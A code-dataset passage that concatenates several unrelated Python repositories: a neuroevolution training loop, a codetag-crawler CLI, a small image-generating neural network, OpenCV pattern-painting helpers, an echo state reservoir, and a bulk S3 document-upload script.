neuron_init, axon_init = genome_to_init_data(genomes[0])
for genome in genomes:
engine = NeuronEngine(
input_arity = problem.input_arity,
output_arity = problem.output_arity,
grid_count = grid_count,
grid_size = grid_size,
actions_max = actions_max,
neuron_initialization_data = neuron_init,
axon_initialization_data = axon_init,
signal_arity = signal_dimensionality,
hox_variant_count = hox_variant_count,
instances_per_iteration = instances_per_iteration,
logger = logger,
genome_id = genome.id,
config_file = copydict(config)
)
result, base_problems = engine.run(problem, "setup")
genome_results.append((result, base_problems))
genomes = list(zip(genomes, [x[0] for x in genome_results], [x[1] for x in genome_results]))
to_return_fitness.append(x[0] for x in genome_results)
log_genome(genomes, 0)
diagnostic_data = {}
diagnostic_data['config'] = copydict(config)
diagnostic_data['iterations'] = []
print("Setup complete. Beginning evolution.")
for num in range(learning_iterations):
statistic_entry = {}
time_genes = 0
time_eval = 0
time_genes_post = 0
time_genes_selection = 0
time_genes_crossover = 0
time_genes_skip_check = 0
egligable_bachelors = [x[0] for x in genomes]
child_data = [[] for _ in range(len(genomes))]
while len([x for x in egligable_bachelors if x is not None]) > 0:
time_genes_stamp = time.time()
time_genes_selection_stamp = time.time()
choice1 = randchoice([x for x in egligable_bachelors if x is not None])
choice2 = randchoice([x for x in egligable_bachelors if x is not None])
indexes = [egligable_bachelors.index(choice1), egligable_bachelors.index(choice2)]
egligable_bachelors[egligable_bachelors.index(choice1)] = None # Currently possible to do crossover with self, which does make some sense with subgraph extraction
if choice2 in egligable_bachelors and choice2 != choice1:
egligable_bachelors[egligable_bachelors.index(choice2)] = None
time_genes_selection += time.time() - time_genes_selection_stamp
time_genes_crossover_stamp = time.time()
new_genomes = choice1.crossover(choice2)
time_genes_crossover += time.time() - time_genes_crossover_stamp
time_genes_skip_check_stamp = time.time()
skip_eval = [False for num in range(len(new_genomes))]
for numero in range(len(new_genomes)):
genome = new_genomes[numero]
if genome.equals_no_id(choice1):
skip_eval[numero] = 1
if genome.equals_no_id(choice2):
skip_eval[numero] = 2
time_genes_skip_check += time.time() - time_genes_skip_check_stamp
genome_results = []
time_genes += time.time() - time_genes_stamp
time_eval_stamp = time.time()
engine_problems = []
for numero in range(len(new_genomes)):
genome = new_genomes[numero]
if not skip_eval[numero]:
neuron_initialization_data, axon_initialization_data = genome_to_init_data(genome)
engine = NeuronEngine(
input_arity = problem.input_arity,
output_arity = problem.output_arity,
grid_count = grid_count,
grid_size = grid_size,
actions_max = actions_max,
neuron_initialization_data = neuron_initialization_data,
axon_initialization_data = axon_initialization_data,
signal_arity = signal_dimensionality,
hox_variant_count = hox_variant_count,
instances_per_iteration = instances_per_iteration,
logger = logger,
genome_id = genome.id,
config_file = copydict(config)
)
engine_problems.append((engine, problem, num))
elif skip_eval[numero] == 1:
genome_results.append((genomes[indexes[0]][1], genomes[indexes[0]][2]))
else:
genome_results.append((genomes[indexes[1]][1], genomes[indexes[1]][2]))
with Pool() as p:
results = p.map(multiprocess_code, engine_problems)
genome_results += results
#for numero in range(len(new_genomes)):
# genome = new_genomes[numero]
# if not skip_eval[numero]:
# neuron_initialization_data, axon_initialization_data = genome_to_init_data(genome)
# engine = NeuronEngine(
# input_arity = problem.input_arity,
# output_arity = problem.output_arity,
# grid_count = grid_count,
# grid_size = grid_size,
# actions_max = actions_max,
# neuron_initialization_data = neuron_initialization_data,
# axon_initialization_data = axon_initialization_data,
# signal_arity = signal_dimensionality,
# hox_variant_count = hox_variant_count,
# instances_per_iteration = instances_per_iteration,
# logger = logger,
# genome_id = genome.id,
# config_file = copydict(config)
# )
# genome_results.append(engine.run(problem, num))
# elif skip_eval[numero] == 1:
# genome_results.append((genomes[indexes[0]][1], genomes[indexes[0]][2]))
# else:
# genome_results.append((genomes[indexes[1]][1], genomes[indexes[1]][2]))
time_eval += time.time() - time_eval_stamp
time_genes_stamp = time.time()
base_problems = [x[1] for x in genome_results]
genome_results = [x[0] for x in genome_results]
# all children of a parent compete for the parents spots
for x in range(len(new_genomes)):
child_data[indexes[0]].append((new_genomes[x], genome_results[x], base_problems[x]))
child_data[indexes[1]].append((new_genomes[x], genome_results[x], base_problems[x]))
time_genes += time.time() - time_genes_stamp
time_genes_post_stamp = time.time()
change_better = [False for x in range(len(genomes))]
change_neutral = [False for x in range(len(genomes))]
for num3 in range(len(child_data)):
score_view = [x[1] for x in child_data[num3]]
score_min = min(score_view)
min_index = score_view.index(score_min)
if score_min <= genomes[num3][1]:
if score_min < genomes[num3][1]:
change_better[num3] = True
else:
change_neutral[num3] = True
genomes[num3] = child_data[num3][min_index]
for num3 in range(len(genomes)):
genome = genomes[num3][0]
x = (genome.config['mutation_chance_node']+genome.config['mutation_chance_link'])/2
genome.config['mutation_chance_link'] = x
genome.config['mutation_chance_node'] = x
if change_better[num3]:
pass
elif change_neutral[num3]:
genome.config['mutation_chance_node'] = min(genome.config['max_mutation_chance_node'], genome.config['mutation_chance_node']*config['neutral_mutation_chance_node_multiplier'])
genome.config['mutation_chance_link'] = min(genome.config['max_mutation_chance_link'], genome.config['mutation_chance_link']*config['neutral_mutation_chance_link_multiplier'])
else:
if not(genome.hypermutation):
genome.config['mutation_chance_node'] *= config['fail_mutation_chance_node_multiplier']
genome.config['mutation_chance_link'] *= config['fail_mutation_chance_link_multiplier']
if genome.config['mutation_chance_node'] < 0.000001:
genome.hypermutation = True
else:
genome.config['mutation_chance_node'] = config['hypermutation_mutation_chance']
genome.config['mutation_chance_link'] = config['hypermutation_mutation_chance']
genome.update_config()
times_a_genome_took_population_slot_from_other_genome = 0
average_takeover_probability = 0
for num4 in range(config['genome_replacement_tries']):
genome_one = randchoice(genomes)
genome_two = randchoice([x for x in genomes if x is not genome_one])
diff = abs(genome_one[1] - genome_two[1])
maxi = max(genome_one[1], genome_two[1])
average_takeover_probability += diff*config['replacement_fitness_difference_scaling']/maxi
if diff > config['replacement_fitness_difference_threshold']:
if randcheck(diff*config['replacement_fitness_difference_scaling']/maxi):
if genome_one[1] > genome_two[1]:
genomes[genomes.index(genome_two)] = genome_one
else:
genomes[genomes.index(genome_one)] = genome_two
times_a_genome_took_population_slot_from_other_genome += 1
if times_a_genome_took_population_slot_from_other_genome != 0:
average_takeover_probability = average_takeover_probability/config['genome_replacement_tries']
statistic_entry["genome_replacement_stats"] = {
"times_a_genome_took_population_slot_from_other_genome" : times_a_genome_took_population_slot_from_other_genome,
"average_takover_probability" : average_takeover_probability
}
time_genes_post += time.time() - time_genes_post_stamp
#print(num, [f"{x[1]}, {x[2]}" for x in genomes])
print(f"------------------- {num} ------------------")
print(f"genes:{time_genes}, genes_selection:{time_genes_selection}, genes_crossover:{time_genes_crossover}, " +\
f"genes_skip_check:{time_genes_skip_check}, eval:{time_eval}, genes_post:{time_genes_post}")
statistic_entry['iteration'] = num
time_statistic_entry = {
"genes":time_genes,
"genes_selection":time_genes_selection,
"genes_crossover":time_genes_crossover,
"genes_skip_check":time_genes_skip_check,
"eval":time_eval,
"genes_post":time_genes_post
}
statistic_entry['time'] = time_statistic_entry
genomes_data = {
"genome_list":[]
}
for genome in genomes:
module_list, _ = genome[0].add_cgp_modules_to_list([], genome[0])
module_list_recursive, module_max_depth = genome[0].add_cgp_modules_to_list([], genome[0], True)
node_type_counts = genome[0].get_node_type_counts()
total_active_nodes = sum(node_type_counts.values())
genome_entry = {
"id":genome[0].id,
"fitness":genome[1],
"performance_stats":genome[2],
"node_mutation_chance":genome[0].config['mutation_chance_node'],
"link_mutation_chance":genome[0].config['mutation_chance_link'],
"module_count_non_recursive":len(module_list),
"module_count_recursive":len(module_list_recursive),
"cgp_node_types": node_type_counts
}
genomes_data["genome_list"] += [genome_entry]
print()
print(genome[0].id)
print(genome[1])
print(genome[2])
print(genome[0].config['mutation_chance_node'], genome[0].config['mutation_chance_link'])
statistic_entry['genomes_data'] = genomes_data
diagnostic_data['iterations'] += [statistic_entry]
to_return_fitness.append([x[1] for x in genomes])
log_genome(genomes, num)
#_genomes = [x[0] for x in genomes]
#for gen in _genomes:
# print(str(gen))
logger.log_statistic_data(diagnostic_data)
return to_return_fitness, diagnostic_data
if __name__ == "__main__":
import configparser
config = configparser.ConfigParser()
config.read('config.ini')
config = config["Default"]
config = process_config(config)
if config['mode'] == 'run':
print("Running evolution")
import cProfile
cProfile.run("run(config, print_output=True)")
#run(config, print_output=True)
elif config['mode'][0] == 'load':
# TODO not fully implemented
# TODO if fully implementing unify code with run function better, outdated due to code duplications
print("Loading program")
loadfile = config['mode'][1]
loadprogram = config['mode'][2]
# get specific cgp program
with open(loadfile, 'r') as f:
data = f.readlines()
data = data[0]
genomes = data.split('|')
correct_genome = None
for genome in genomes:
gene_dat = json.loads(genome)
if gene_dat['genome_id'].split("->")[1][1:] == loadprogram:
correct_genome = gene_dat
break
if correct_genome is None:
print(f"Genome {loadprogram} not found")
else:
print("Genome found")
neuron_internal_states = config['neuron_internal_state_count']
dendrite_internal_states = config['axon_dendrite_internal_state_count']
signal_dimensionality = config['signal_dimensionality']
dimensions = 3 # other dimensions not supported - code in engine.py specific to 3d grid
hox_variant_count = config['hox_variant_count']
genome_counter = Counter()
genome_count = config['genome_count']
seed = config['seed']
random.seed(seed)
neuron_function_order = [
'axon_birth_program',
'signal_axon_program',
'recieve_axon_signal_program',
'recieve_reward_program',
'move_program',
'die_program',
'neuron_birth_program',
'action_controller_program',
'hox_variant_selection_program',
'internal_state_variable_count' # not function but parameter comes here in the order
]
neuron_function_arities = [ # by order above
[dimensions+neuron_internal_states+1, 4+signal_dimensionality+neuron_internal_states], # axon birth
[signal_dimensionality+dimensions+neuron_internal_states, 2 + signal_dimensionality + neuron_internal_states], # signal axon
[signal_dimensionality + dimensions + neuron_internal_states, 2 + neuron_internal_states+signal_dimensionality], # recieve signal axon
[1 + dimensions + neuron_internal_states, 2 + neuron_internal_states], # reciee reward
[neuron_internal_states + dimensions, 7+neuron_internal_states], # move
[dimensions + neuron_internal_states, 2+neuron_internal_states], # die
[dimensions + neuron_internal_states, 2+neuron_internal_states*2], # neuron birth
[neuron_internal_states+dimensions, 9], # action controller
[neuron_internal_states + dimensions, hox_variant_count] # hox selection
]
dendrite_function_order = [
'recieve_signal_neuron_program',
'recieve_signal_dendrite_program',
'signal_dendrite_program',
'signal_neuron_program',
'accept_connection_program',
'break_connection_program',
'recieve_reward_program',
'die_program',
'action_controller_program'
]
dendrite_function_arities = [
[dendrite_internal_states + signal_dimensionality + dimensions, 2+signal_dimensionality+dendrite_internal_states],
[dendrite_internal_states + signal_dimensionality + dimensions, 2+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + signal_dimensionality, 4+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + signal_dimensionality, 4+signal_dimensionality+dendrite_internal_states],
[dimensions + dendrite_internal_states + dimensions + dendrite_internal_states, 2+dendrite_internal_states], # Accept connection
[dimensions + dendrite_internal_states + dimensions + dendrite_internal_states, 1], # Break connection
[dimensions + dendrite_internal_states + 1, 2 + dendrite_internal_states], # recieve reward
[dimensions + dendrite_internal_states, 1+signal_dimensionality], # die
[dendrite_internal_states + dimensions, 3]
]
logger = Logger.Logger(os.path.join(os.path.dirname(__file__), "logfiles") + "\\log", config['logger_ignore_messages'], config['advanced_logging'])
genome_successor_count = 4
if not config['non_crossover_children']:
genome_successor_count = 2
all_function_arities = neuron_function_arities + dendrite_function_arities
genome = Genome(
homeobox_variants = hox_variant_count,
successor_count = genome_successor_count,
input_arities = all_function_arities,
counter = genome_counter,
internal_state_variables = neuron_internal_states,
names = neuron_function_order[:-1] + dendrite_function_order,
logger = logger,
genome_counter = genome_counter,
config = config)
genome.load(correct_genome)
problem = stupid_problem_test.StupidProblem()
def genome_to_init_data(genome):
neuron_init_data = {
'axon_birth_programs' : genome.function_chromosomes[0],
'signal_axon_programs' : genome.function_chromosomes[1],
'recieve_axon_signal_programs': genome.function_chromosomes[2],
'recieve_reward_programs': genome.function_chromosomes[3],
'move_programs': genome.function_chromosomes[4],
'die_programs': genome.function_chromosomes[5],
'neuron_birth_programs': genome.function_chromosomes[6],
'action_controller_programs': genome.function_chromosomes[7],
'hox_variant_selection_program': genome.hex_selector_genome.program,
'internal_state_variable_count': neuron_internal_states
}
axon_init_data = {
'recieve_signal_neuron_programs' : genome.function_chromosomes[8],
'recieve_signal_dendrite_programs' : genome.function_chromosomes[9],
'signal_dendrite_programs' : genome.function_chromosomes[10],
'signal_neuron_programs' : genome.function_chromosomes[11],
'accept_connection_programs' : genome.function_chromosomes[12],
'break_connection_programs' : genome.function_chromosomes[13],
'recieve_reward_programs' : genome.function_chromosomes[14],
'die_programs' : genome.function_chromosomes[15],
'action_controller_programs' : genome.function_chromosomes[16],
'internal_state_variable_count': dendrite_internal_states
}
return neuron_init_data, axon_init_data
neuron_init, axon_init = genome_to_init_data(genome)
engine = NeuronEngine(
input_arity = problem.input_arity,
output_arity = problem.output_arity,
grid_count = 6,
grid_size = 10,
actions_max = 120,
neuron_initialization_data = neuron_init,
axon_initialization_data = axon_init,
signal_arity = signal_dimensionality,
hox_variant_count = hox_variant_count,
instances_per_iteration = 50,
logger = logger,
genome_id = genome.id,
config_file = copydict(config)
)
engine.run(problem, 0)
``` |
{
"source": "jonoddram/CodetagCrawler",
"score": 2
} |
#### File: CodetagCrawler/CodetagCrawler/cli.py
```python
import os
from .metadata_handler import *
import click
from .comment_processing import *
from .csv import *
@click.group()
def cli():
pass
@click.command()
@click.option('--input', '-i', help='Path to input folder')
@click.option('--output', '-o', help='Path to new output file')
@click.option('--config', '-c', help='Path to config file', required=False, default=
os.path.join(os.path.dirname(__file__), 'config.yml'))
def process(input, output, config):
input = os.path.normpath(input)
output = os.path.normpath(output)
metadata = get_metadata(config)
comment_processor = CommentProcessor(metadata['CODETAGS'], metadata['IGNORE_DIRECTORIES'])
file_names = comment_processor.get_all_filenames(input)
filtered = comment_processor.filter_list_ending(file_names, '.py')
files_comments = comment_processor.extract_comments(input, filtered)
files_comments = comment_processor.filter_out_comment_starts_all(files_comments)
files_comments = comment_processor.filter_out_non_codetag_comments_all(files_comments, metadata['CODETAGS'])
write_csv(output, files_comments, metadata['CODETAG_TO_WORK_ITEM_TYPE'])
cli.add_command(process)
if __name__ == '__main__':
cli()
``` |
{
"source": "jonoddram/neural_network_imagin_experiments",
"score": 3
} |
#### File: neural_network_imagin_experiments/v.0.1.6(.1) code/NN.py
```python
from numba import jit, njit
import numpy as np
import random
import PIL.Image as Image
import timeit
# The following is based on <NAME>s Machine Learning chapter about neural networks particularly p. 98, although
# the matrix version is something I've tried to derive so it may be erronous, look carefully through before use.
# 0.1.3: Added very basic adaptive adjustment of learning rate, only down
# 0.1.4: Images are now not thumbnails but just scaled.
# 0.1.4: Added "proper" gradient descent mode
# 0.1.4: Now remembers momentum across epochs.
# 0.1.4: Increased network size - hidden layer 1 doubled, hidden layer 2 octoupled. - reverted
# 0.1.4: Hidden layer 1 and 2 node count halved
# 0.1.4: Also had a look at scipy for using sparse matricies. Seemed to have rather poor support of elementwise operations...
# 0.1.5: Turns out Pillows resize function returns a resized image instead of resizing in place. This means the training data only
# saved the upper left corner of each image instead of the entire image, explaining why the network was unable to learn... as there was little to learn.
# 0.1.5.1: Reverted hidden network size to ImageSize.
# 0.1.6: Added individual learning rates to weights, removed gradient descent - REVERTED
# 0.1.6.1: Re-implemented global adaptive learning rate
Version = "0.1.6.2"
LearningRate = 0.1
ImageSize = 110
TargetEpochs = 1000000
output_path = "D:\\jonod\\Pictures\\BackpropExperiment\\Outputs" # path to output folder, also folder with training data in it.
mode = "Stochastic_Gradient_Descent" # only stochastic gradient descent is currently implemented
# Consider making a sparse matrix at some point to improve efficiency?
# Maybe a "reverse" convolutional neural network?
# Slightly misleading names, are actually weight matrices, consider refactoring
# Init layers
nodes_input = np.zeros((ImageSize, 8), np.float64) # from 8 input nodes to 8 nodes
nodes_hidden1 = np.zeros((ImageSize, ImageSize), np.float64) # 6 nodes to 4 nodes
nodes_hidden2 = np.zeros((ImageSize*ImageSize, ImageSize), np.float64) # 6 nodes to ImageSize*ImageSize*4 output nodes (ImageSize x ImageSize Black and White)
# This one does not work with @njit, the issue seems to be related to the dot product always returning the same value. The same happens when all values are not 0
def calculate_output(in1, in2, in3, in4, in5, in6, in7, in8):
#print(np.asarray([[in1], [in2], [in3], [in4], [in5], [in6], [in7], [in8]], np.float64))
#print(sigmoid(np.asarray([[in1], [in2], [in3], [in4], [in5], [in6], [in7], [in8]], np.float64)))
#print(np.dot(nodes_input, sigmoid(np.asarray([[in1], [in2], [in3], [in4], [in5], [in6], [in7], [in8]], np.float64)))) # Error seems to be here, this always is 0? - Issue is with njit
#print(sigmoid(np.dot(nodes_input, sigmoid(np.asarray([[in1], [in2], [in3], [in4], [in5], [in6], [in7], [in8]], np.float64)))))
hidden1_output = sigmoid(np.dot(nodes_input, sigmoid(np.asarray([[in1], [in2], [in3], [in4], [in5], [in6], [in7], [in8]], np.float64)))) # 4 x 3 * 3 x 1 => 4 x 1
hidden2_output = sigmoid(np.dot(nodes_hidden1, hidden1_output)) # 3 x 4 * 4 x 1 => 3 x 1
output = sigmoid(np.dot(nodes_hidden2, hidden2_output)) # ImageSize*ImageSize*4 x 3 * 3 x 1 = ImageSize*ImageSize*4 x 1
return hidden1_output, hidden2_output, output
@njit
def calc_output_layer_error(network_output, training_value):
return np.multiply(np.multiply(network_output, (1-network_output)), np.subtract(training_value, network_output))
@njit
def calc_hidden_layer_error(hiddenOutput, hiddenWeights, outputError):
# Seems to return only the one same value
return np.multiply(np.multiply(hiddenOutput, np.subtract(np.ones(hiddenOutput.shape, np.float64), hiddenOutput)), np.dot(np.transpose(hiddenWeights), outputError))
@njit
def sigmoid(a):
return 1.0/(1.0 + np.power(np.e, -a)) # 0.5 is bias so it is not centered around 0
@njit
def update(error, the_input, learning_rate, last_update):
# W/momentum, calculated as in Tom Mitchell book
return learning_rate * (error * np.transpose(the_input)) + learning_rate * last_update # I think the_input is just the output of the previous layer in terms of what matrix to input, but I haven't checked so may be error source
def save_image(outputValues, filepath):
img = Image.new('RGB', (ImageSize, ImageSize))
for x in range(0, ImageSize):
for y in range(0, ImageSize):
img.putpixel((x, y), (int(outputValues[(y + x * ImageSize)][0]*255.0),
int(float(outputValues[(y + x * ImageSize)][0]) * 255.0),
int(float(outputValues[(y + x * ImageSize)][0]) * 255.0)))
img.save(filepath)
# Used to test that input images are output correctly
def save_image_input_test(outputValues, filepath):
img = Image.new('RGB', (ImageSize, ImageSize))
for x in range(0, ImageSize):
for y in range(0, ImageSize):
img.putpixel((x, y), (int(float(outputValues[(y + x * ImageSize)]) * 255.0),
int(float(outputValues[(y + x * ImageSize)]) * 255.0),
int(float(outputValues[(y + x * ImageSize)]) * 255.0)))
img.save(filepath)
# Start benchmark timer
start_time = timeit.default_timer()
# Load in training examples:
# Correct output format r1 g1 b1 a1 r2 g2 b2 a2 ...
# training file will be: seed1|seed2|seed3|r1|g1|b1|a1|r2|...!
training_file = open(output_path + "\\" + Version + "_training.txt", 'r')
text = training_file.read()
training_file.close()
process_step_zero = text.split("!")
training_data = []
for y in range(len(process_step_zero)): # Potential optimization
training_data.append([x for x in process_step_zero[y].split("|")])
# Test that input is stored and shown properly
for y in training_data:
save_image_input_test(y[4:], output_path + "\\" + Version + y[0] + "_test.png",)
epoch = 0
endNext = False
#last_average_error = float("inf")
average_error = 0
# Do training:
if mode == "Stochastic_Gradient_Descent": # This may seem like unneseccary code duplication but putting the if statement outside of the loop is marginally more efficient computationally
last_nodes_input = np.zeros((ImageSize, 8), np.float64)
last_nodes_hidden1 = np.zeros((ImageSize, ImageSize), np.float64)
last_nodes_hidden2 = np.zeros((ImageSize * ImageSize, ImageSize), np.float64)
while True:
average_error = 0
random.shuffle(training_data) # Randomize order of training data
for num in range(0, len(training_data)):
imageName = training_data[num][0] # Used only for filenames
in1, in2, in3, in4, in5, in6, in7, in8 = float(training_data[num][1]), float(training_data[num][2]), \
float(training_data[num][3]), float(training_data[num][4]), \
float(training_data[num][5]), float(training_data[num][6]), \
float(training_data[num][7]), float(training_data[num][8]),
target_output = np.asarray(training_data[num][9:],
np.float64) # Potential errors: Wrong indexing, wrong matrix format, strings not floats
target_output.shape = (ImageSize * ImageSize, 1)
hidden1_output, hidden2_output, output = calculate_output(in1, in2, in3, in4, in5, in6, in7, in8)
output_error = calc_output_layer_error(output, target_output)
hidden2_error = calc_hidden_layer_error(hidden2_output, nodes_hidden2, output_error)
hidden1_error = calc_hidden_layer_error(hidden1_output, nodes_hidden1, hidden2_error)
average_error += sum(np.power(np.subtract(output, target_output), 2)) * 1 / 2
update_nodes_input = update(hidden1_error, np.asarray([in1, in2, in3, in4, in5, in6, in7, in8], np.float64),
LearningRate, last_nodes_input)
update_nodes_hidden1 = update(hidden2_error, hidden1_output, LearningRate, last_nodes_hidden1)
update_nodes_hidden2 = update(output_error, hidden2_output, LearningRate, last_nodes_hidden2)
nodes_input = nodes_input + update_nodes_input
nodes_hidden1 = nodes_hidden1 + update_nodes_hidden1
nodes_hidden2 = nodes_hidden2 + update_nodes_hidden2
# Momentum
last_nodes_input = update_nodes_input
last_nodes_hidden1 = update_nodes_hidden1
last_nodes_hidden2 = update_nodes_hidden2
if endNext:
save_image(output,
output_path + "\\" + Version + "_Filename_" + imageName + "_Epoch_" + str(epoch) + ".png")
if epoch % 100 == 0:
#if average_error > last_average_error:
# LearningRate *= 0.5
#last_average_error = average_error
print(epoch, average_error / len(training_data))
epoch += 1
if endNext:
for num in range(0,
2): # This feels super dumb but it is the first and best solution I thought of so it'll do for prototyping
for num2 in range(0, 2):
for num3 in range(0, 2):
for num4 in range(0, 2):
for num5 in range(0, 2):
for num6 in range(0, 2):
for num7 in range(0, 2):
for num8 in range(0,
2): # Generate every possible permutation of the eight inputs
hidden1_output, hidden2_output, output = calculate_output(num, num2, num3,
num4, num5, num6,
num7, num8)
save_image(output, output_path + "\\" + Version + "_Output_" + str(num)
+ str(num2) + str(num3) + str(num4) +
str(num5) + str(num6) + str(num7) + str(num8) + ".png")
break
else:
endNext = average_error / len(training_data) < 1 or epoch > TargetEpochs
``` |
{
"source": "jonoddram/Patterner",
"score": 3
} |
#### File: jonoddram/Patterner/functions.py
```python
import cv2
import math
import numpy as np
# rotate function open source from internet
def rotate(image, theta):
"""
Rotates image
:param image: image to rotate
:param theta: degrees to rotate
:return: rotated image
"""
(h, w) = image.shape[:2]
center = (w / 2, h / 2)
M = cv2.getRotationMatrix2D(center, theta, 1)
rotated = cv2.warpAffine(image, M, (int(w), int(h)), cv2.INTER_LINEAR,
borderMode=cv2.BORDER_CONSTANT, borderValue=(255, 255, 255))
return rotated
def crop_transform(image, pattern, center_xy):
"""
Crops pattern such that it fits in image
:param image: image to paint on
:param pattern: pattern to paint
:param center_xy: the xy coords on image where the center of pattern should be placed
:return: cropped pattern, left, right, top, bot in img viewport
"""
img_dim_x, img_dim_y, _ = image.shape
pat_dim_x, pat_dim_y, _ = pattern.shape
(x, y) = center_xy
pat_left_imgviewport = int(math.floor(x - pat_dim_x/2))
pat_right_imgviewport = int(math.ceil(x + pat_dim_x/2))
pat_top_imgviewport = int(math.floor(y - pat_dim_y/2))
pat_bot_imgviewport = int(math.ceil(y + pat_dim_y/2))
cropleft = -pat_left_imgviewport if pat_left_imgviewport < 0 else 0
if pat_right_imgviewport > img_dim_x:
cropright = pat_dim_x - (pat_right_imgviewport - img_dim_x)
else:
cropright = pat_right_imgviewport
croptop = -pat_top_imgviewport if pat_top_imgviewport < 0 else 0
if pat_bot_imgviewport > img_dim_y:
cropbot = pat_dim_y - (pat_bot_imgviewport - img_dim_y)
else:
cropbot = pat_bot_imgviewport
modified_pattern = pattern[cropleft:cropright, croptop:cropbot]
pat_left_imgviewport = max(pat_left_imgviewport, 0)
pat_top_imgviewport = max(pat_top_imgviewport, 0)
pat_bot_imgviewport = min(pat_bot_imgviewport, img_dim_y)
pat_right_imgviewport = min(pat_right_imgviewport, img_dim_x)
return modified_pattern, pat_left_imgviewport, pat_right_imgviewport, pat_top_imgviewport, pat_bot_imgviewport
def init_img(x, y):
return np.zeros((x, y, 3))
def paint_pattern(image, pattern, center_xy, alpha):
"""
paints a pattern on an image, crops pattern if out of bounds
:param image: image to paint on
:param pattern: pattern to paint
:param center_xy: the xy coords on image where the center of pattern should be placed
:param alpha: Strength of pattern that is painted (in transparency)
:return: image with pattern painted on it
"""
img_dim_x, img_dim_y, _ = image.shape
pat_dim_x, pat_dim_y, _ = pattern.shape
(x, y) = center_xy
pat_left_imgviewport = int(math.floor(x - pat_dim_x / 2))
pat_right_imgviewport = int(math.ceil(x + pat_dim_x / 2))
pat_top_imgviewport = int(math.floor(y - pat_dim_y / 2))
pat_bot_imgviewport = int(math.ceil(y + pat_dim_y / 2))
image[pat_left_imgviewport:pat_right_imgviewport, pat_top_imgviewport:pat_bot_imgviewport] += pattern * alpha
return image, (pat_left_imgviewport, pat_top_imgviewport), (pat_right_imgviewport, pat_bot_imgviewport)
def linalg_solve_img(target_image, pattern_positions, patterns, pad, x_max, y_max):
target_image = target_image.flatten()
#target_image = target_image.reshape((target_image.shape[0], 1))
def _p(x):
return (x[0]+pad, x[1]+pad)
_patterns = []
for pos in pattern_positions:
pos = _p(pos)
for pat in patterns:
_patterns.append(paint_pattern(init_img(x_max+pad*2, y_max+pad*2), pat, pos, 1.0)[0]
[pad:x_max+pad,pad:y_max+pad].flatten())
patterns = np.asarray(_patterns).transpose()
activations = np.linalg.lstsq(patterns, target_image)[0]
produced_image = patterns @ activations
produced_image = produced_image.reshape((x_max, y_max, 3)).astype(int)
return produced_image
``` |
{
"source": "jonoddram/Reservoir-computing-image-manipulation",
"score": 2
} |
#### File: jonoddram/Reservoir-computing-image-manipulation/echo_reservoir.py
```python
import numpy
import scipy.sparse
class echo_reservoir:
def __init__(self, adjacency_matrix, input_producer, output_consumer, matrix_width, matrix_height, chaos_factor):
self.adjacency_matrix = adjacency_matrix
self.input_producer = input_producer
self.output_consumer = output_consumer
self.timestep = 0
self.matrix_width = matrix_width
self.matrix_height = matrix_height
self.node_values = numpy.zeros([matrix_width * matrix_height], dtype=float)
self.chaos_factor = chaos_factor
def do_timestep(self):
update = scipy.sparse.csr_matrix.dot(self.adjacency_matrix, self.node_values) # removing division causes overflow in line 19 - not sure how but node values greater than 1 seem to be carried over form previous iterations?
check = update >= 1.0
if True in check:
update = (update - min(update)) / (
max(update) - min(update)) # map to range [0, 1], prevents overflow
self.node_values = self.input_producer(self.timestep) + self.chaos_factor*update*(1-update) # logistic function w/ chaos valued parameter
check = self.node_values >= 1.0
if True in check:
self.node_values = (self.node_values-min(self.node_values))/(max(self.node_values) - min(self.node_values)) # map to range [0, 1], prevents overflow
self.output_consumer(self.node_values)
self.timestep += 1
def do_timestep_old(self):
# The version of do timestep that seemed to do edge-detection and such
update = scipy.sparse.csr_matrix.dot(self.adjacency_matrix,
self.node_values)(self.matrix_height*self.matrix_width) # removing division causes overflow in line 19 - not sure how but node values greater than 1 seem to be carried over form previous iterations?
self.node_values = self.input_producer(self.timestep) + self.chaos_factor * update * (
1 - update) # logistic function w/ chaos valued parameter
check = self.node_values >= 1.0
if True in check:
self.node_values = (self.node_values - min(self.node_values)) / (
max(self.node_values) - min(self.node_values)) # map to range [0, 1], prevents overflow
self.output_consumer(self.node_values)
self.timestep += 1
def run(self, timesteps):
for num in range(self.timestep, timesteps):
self.do_timestep()
``` |
{
"source": "jonodrew/digitalmarketplace-scripts",
"score": 2
} |
#### File: digitalmarketplace-scripts/dmscripts/bulk_upload_documents.py
```python
import os
import re
import csv
from dmutils.documents import get_document_path, generate_download_filename
def upload_file(bucket, dry_run, file_path, framework_slug, bucket_category,
document_category=None, document_type=None, supplier_name_dict=None):
supplier_id = get_supplier_id_from_framework_file_path(file_path)
if document_category is None:
document_name = get_document_name_from_file_path(file_path)
else:
document_name = '{0}.{1}'.format(document_category, document_type)
if 'signed-framework-agreement' in document_name:
print('Signed and countersigned agreement paths now need to be stored in database so can no longer be uploaded '
'using this script.')
return
upload_path = get_document_path(framework_slug, supplier_id, bucket_category,
document_name)
if supplier_name_dict is None:
download_filename = None
else:
supplier_name = supplier_name_dict[supplier_id]
download_filename = generate_download_filename(
supplier_id, document_name, supplier_name)
if not dry_run:
with open(file_path, 'rb') as source_file:
bucket.save(upload_path, source_file, acl='bucket-owner-full-control', download_filename=download_filename)
print(supplier_id)
else:
print("[Dry-run] UPLOAD: '{}' to '{}'".format(file_path, upload_path))
def get_bucket_name(stage, bucket_category):
bucket_name = 'digitalmarketplace-{0}-{1}-{1}'.format(bucket_category, stage)
print("BUCKET: {}".format(bucket_name))
return bucket_name
def get_all_files_of_type(local_directory, file_type):
for root, subfolder, files in os.walk(local_directory):
for filename in files:
if filename.endswith(file_type):
yield os.path.join(root, filename)
def get_supplier_id_from_framework_file_path(path):
match = re.search(r'(?:/|-)(\d{5,6})[-_]', path)
if not match:
raise ValueError("Could not find supplier ID in path {}".format(path))
return match.group(1)
def get_document_name_from_file_path(path):
match = re.search(r'/\d{5,6}-(.*)', path)
return match.group(1)
def get_supplier_name_dict_from_tsv(tsv_path):
suppliers_name_dict = {}
with open(tsv_path, 'r') as tsvfile:
tsv_reader = csv.reader(tsvfile, delimiter='\t')
for row in tsv_reader:
suppliers_name_dict[row[0]] = row[1]
return suppliers_name_dict
```
#### File: digitalmarketplace-scripts/dmscripts/generate_framework_agreement_signature_pages.py
```python
import os
import io
import shutil
import re
import subprocess
from datetime import datetime
from dmscripts.helpers.html_helpers import render_html
from dmscripts.helpers import logging_helpers
from dmscripts.helpers.logging_helpers import logging
logger = logging_helpers.configure_logger({'dmapiclient.base': logging.WARNING})
def save_page(html, supplier_id, output_dir, descriptive_filename_part):
